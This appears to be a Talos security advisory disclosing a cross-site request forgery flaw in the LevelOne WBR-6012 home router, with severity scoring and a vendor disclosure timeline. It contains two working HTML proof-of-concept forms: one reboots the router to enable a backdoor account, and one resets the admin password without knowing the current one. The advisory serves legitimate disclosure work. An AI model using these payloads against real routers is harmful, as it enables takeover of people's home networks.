Talos Vulnerability Report

SUMMARY

A cross-site request forgery (CSRF) vulnerability exists in the Web Application functionality of the LevelOne WBR-6012 R0.40e6. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious web page to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6012 R0.40e6

PRODUCT URLS

WBR-6012 - https://us.level1.com/products/wbr-6012

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-352 - Cross-Site Request Forgery (CSRF)

DETAILS

The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.

The LevelOne WBR-6012 router’s web application has a CSRF vulnerability that permits attackers to execute unauthorized actions without the user’s knowledge because it lacks proper origin enforcement, allowing external websites to make requests as if they were the user. There does not appear to be any logic within the device’s firmware which checks the origin of HTTP requests.

Exploit Proof of Concept

The two proofs of concept below demonstrate leveraging the Cross Site Request Forgery (CSRF) vulnerability in conjunction with two other vulnerabilities to 1) reboot the device to enable the backdoor account (TALOS-2024-XXXX) and 2) change the admin’s password without knowing the exising password (TALOS-2024-XXXX).

Reboot the Device (enable the backdoor, TALOS-2024-1979)

<html>
<form enctype="application/x-www-form-urlencoded" method="GET" action="http://192.168.1.1/cgi-bin/rebo">
    <table>
        <tr>
            <td></td>
            <td><input type="text" value="undefined" name=""></td>
        </tr>
    </table><input type="submit" value="submit">
</form>

</html>

Change the Password (without knowledge of the existing password, TALOS-2024-1984)

<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="http://192.168.1.1/cgi-bin/pass">
    <table>
        <tr>
            <td>dummy param</td>
            <td><input type="text" value="test" name="test"></td>
        </tr>
        <tr>
            <td>new pw</td>
            <td><input type="text" value="test" name="Pa"></td>
        </tr>
    </table><input type="submit" value="http://192.168.1.1/cgi-bin/pass">
</form>

</html>

TIMELINE

2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release